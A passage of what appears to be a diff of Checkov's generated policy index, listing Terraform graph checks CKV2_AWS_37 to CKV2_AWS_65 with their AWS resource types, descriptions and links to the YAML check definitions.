[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1409 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1410 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1411 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1412 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1413 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1414 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1415 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1416 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1417 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1418 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1419 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1420 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1421 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1422 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1423 | CKV2_AWS_37 | resource | 
aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1424 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1425 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1426 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1427 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1428 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1429 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1430 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1431 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1432 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1433 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1434 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1435 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1436 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1437 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1438 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1439 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1440 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1441 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1442 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1443 
| CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1444 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1445 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1446 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1447 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1448 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1449 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1450 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1451 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1452 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1453 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1454 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1455 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1456 | CKV2_AWS_37 | resource | 
aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1457 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1458 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1459 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1460 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1461 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | -| 1462 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | 
[Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | -| 1463 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1464 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1465 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1466 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1467 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1468 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1469 | CKV2_AWS_41 
| resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | -| 1470 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | -| 1471 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | -| 1472 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1473 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1474 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1475 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder 
is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
-| 1476 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) |
-| 1477 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
-| 1478 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
-| 1479 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) |
-| 1480 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) |
-| 1481 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS 
ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) |
-| 1482 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1483 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1484 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
-| 1485 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
-| 1486 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | 
[OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
-| 1487 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) |
-| 1488 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) |
-| 1489 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) |
-| 1490 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1491 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1492 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1493 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1494 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1495 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1496 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
-| 1497 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) |
-| 1498 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) |
-| 1499 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
-| 1500 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) |
-| 1501 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) |
-| 1502 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) |
-| 1503 | CKV2_AWS_62 | resource | 
aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) |
-| 1504 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) |
-| 1505 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) |
-| 1506 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) |
